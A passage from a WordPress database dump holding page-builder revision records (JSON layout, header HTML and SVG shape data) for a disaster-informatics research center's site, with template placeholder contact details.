ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',20,'https://gsudice.dataconn.net/?p=337',0,'revision','',0),(338,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',23,'https://gsudice.dataconn.net/?p=338',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (339,1,'2022-02-16 15:45:52','2022-02-16 15:45:52','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path 